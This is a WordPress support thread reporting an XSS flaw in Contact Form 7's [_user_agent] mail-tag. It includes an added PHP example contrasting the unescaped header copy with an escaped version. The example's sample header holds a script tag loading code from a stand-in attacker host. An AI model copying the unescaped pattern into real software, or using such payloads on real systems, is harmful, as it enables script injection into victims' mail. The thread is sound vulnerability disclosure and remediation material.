
Contact Form 7
[resolved] Possible XSS in [_user_agent] mail-tag (2 posts)

  1. Ov3rfly
    Member
    Posted 1 year ago #

    When looking at the code of v3.3 special-mail-tags.php because of another issue, I saw a possible XSS injection in the new [_user_agent] mail-tag.

    elseif ( '_user_agent' == $name )
        $output = substr( $_SERVER['HTTP_USER_AGENT'], 0, 254 );

    If emails are sent as HTML (default Contact Form 7 setting is plain-text though) and the mail-tag is used, the shortened but unfiltered user agent ends up within the html of the email and can add remote scripts or other content.

    More details and background information about this attack vector here:
    http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

    http://wordpress.org/extend/plugins/contact-form-7/
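The issue described in the post above, as an added illustration that is not Contact Form 7's own code or the author's fix: the vulnerable copy of the User-Agent header beside an assumed hardened variant that escapes it for the HTML mail body. The function names, the template string and the sample header value are constructed for this example.

```php
<?php
// Added example, not Contact Form 7's code. Shows why an unescaped
// $_SERVER['HTTP_USER_AGENT'] copied into an HTML mail body is a problem.

/** Behaviour as reported: fixed-length copy of the header, no escaping. */
function user_agent_tag_unescaped(array $server): string {
    return substr($server['HTTP_USER_AGENT'] ?? '', 0, 254);
}

/**
 * Assumed hardened variant (not the plugin's actual fix): when the mail
 * body is HTML, the header value is escaped for an HTML text context;
 * for plain-text mail it is passed through unchanged.
 */
function user_agent_tag(array $server, bool $html_mail): string {
    $ua = substr($server['HTTP_USER_AGENT'] ?? '', 0, 254);
    return $html_mail ? htmlspecialchars($ua, ENT_QUOTES | ENT_HTML5, 'UTF-8') : $ua;
}

/** Minimal stand-in for mail-tag substitution in the message template. */
function render_mail(string $template, string $ua_tag): string {
    return str_replace('[_user_agent]', $ua_tag, $template);
}

// Constructed request data: any HTTP client can send an arbitrary User-Agent,
// so the header must be treated as attacker-controlled input.
$server   = ['HTTP_USER_AGENT' => 'Mozilla/5.0 <script src="http://attacker.invalid/x.js"></script>'];
$template = "<p>Sent from: [_user_agent]</p>";

// Vulnerable path: the <script> element survives into the HTML mail.
echo render_mail($template, user_agent_tag_unescaped($server)), "\n";

// Hardened path: angle brackets and quotes become entities, so the mail
// client renders the header as text instead of executing it.
echo render_mail($template, user_agent_tag($server, true)), "\n";
```

Run it with the PHP CLI: the first line of output still contains a live script element, the second shows the same header with `<`, `>` and `"` encoded as entities.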

  2. Takayuki Miyoshi
    Member
    Plugin Author

    Posted 1 year ago #

    You're right. I'll fix it. Thank you.

Topic Closed

This topic has been closed to new replies.
